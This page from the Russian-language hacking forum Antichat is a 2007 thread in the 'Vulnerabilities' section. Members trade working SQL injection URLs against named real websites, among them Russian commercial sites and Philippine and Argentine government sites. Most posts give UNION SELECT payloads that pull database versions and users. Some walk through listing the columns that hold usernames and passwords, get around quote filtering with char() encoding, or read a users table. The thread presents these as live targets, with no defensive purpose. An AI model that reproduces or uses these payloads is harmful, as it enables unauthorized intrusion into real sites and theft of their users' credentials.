ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2431  
Старый 07.06.2007, 17:19
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


Cool

Цитата:
Сообщение от _GaLs_  
http://www.akademokna.ru/pages.php?id='+union+select+1,2,3,4,5,5,6,7,8,9,0, 1,2,3,4,5/*
Мм.....где ты подобрал?
Код:
http://www.akademokna.ru/pages.php?id=-2+union+select+1,concat_ws(char(58),user(),database(),version())/*
 
Ответить с цитированием

  #2432  
Старый 07.06.2007, 19:39
Аватар для alextoun
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://www.bankdelo.ru/kodecs/index.php?page=-1+union+select+version(),2,3,4/*
по пассам и юзерам подобрать можно т.к база 4-ой версии
 
Ответить с цитированием

  #2433  
Старый 07.06.2007, 22:12
Аватар для alextoun
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://www.zgia.zp.ua/index.php?page=-1+union+select+version(),2,3,4,5/*
5-ая
Цитата:
http://www.zgia.zp.ua/index.php?page=-1+union+select+column_name,2,3,4,5+from+informatio n_schema.columns+where+table_name=char(117,115,101 ,114)+limit+0,1/*
кавычки фильтруются, поэтому в аски кодах название таблицы, и так же перебор по лимитам

Цитата:
http://www.zgia.zp.ua/index.php?page=-1+union+select+column_name,2,3,4,5+from+informatio n_schema.columns+where+table_name=char(117,115,101 ,114)+limit+2,1/*
пассы

Цитата:
http://www.zgia.zp.ua/index.php?page=-1+union+select+column_name,2,3,4,5+from+informatio n_schema.columns+where+table_name=char(117,115,101 ,114)+limit+1,1/*
юзеры
 
Ответить с цитированием

  #2434  
Старый 08.06.2007, 01:55
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Код:
http://biomolecula.ru/?page=content&id=-74+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9/*
Код:
http://www.impactsoft.ru/clients.php?razdel_id=1+union+select+1,AES_DECRYPT(AES_ENCRYPT(convert(concat_ws(0x3a,version(),database(),user())+using+cp1251),0x71),0x71),3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #2435  
Старый 08.06.2007, 14:08
Аватар для Пчел
Пчел
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698

Репутация: 20
По умолчанию

Код:
http://www.cebucity.gov.ph/?pageno=12&bac=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

Код:
http://www.chubut.gov.ar/tramites/descripcion_imprimir.php?id=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
 
Ответить с цитированием

  #2436  
Старый 08.06.2007, 16:31
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://ethology.ru/humor/?id=-1+union+select+1,2,3,version(),5/*
Код:
http://happyland.ru/brands.php?id=-2+union+select+1,version(),3,'<script>alert()</script>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
 
Ответить с цитированием

  #2437  
Старый 08.06.2007, 17:24
Аватар для Joker-jar
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Код:
http://www.kaosweaver.com/extensions/details.php?id=1+and+ascii(lower(substring(version(),1,1)))=0x34/*
MySQL 4.x
лень подбирать столбцы
 
Ответить с цитированием

  #2438  
Старый 08.06.2007, 22:08
Аватар для alextoun
alextoun
Постоянный
Регистрация: 07.05.2006
Сообщений: 732
Провел на форуме:
7910701

Репутация: 811


Отправить сообщение для alextoun с помощью ICQ
По умолчанию

Цитата:
http://www.nikolaevskie-oteli.ru/index.php?page=-1+union+select+1,version()/*
ща покопаю её
 
Ответить с цитированием

  #2439  
Старый 08.06.2007, 23:11
Аватар для C!klodoL
C!klodoL
Постоянный
Регистрация: 05.06.2007
Сообщений: 335
Провел на форуме:
4319431

Репутация: 677
По умолчанию

vcam.ru
Код:
http://vcam.ru/index.php?id=-1+union+select+user()/*
 
Ответить с цитированием

  #2440  
Старый 08.06.2007, 23:37
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

Код:
http://www.recyclemetals.org/news_archive_item.php?id=430%20union%20select%201,ID,3,4,5,6%20from%20bmra_users/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ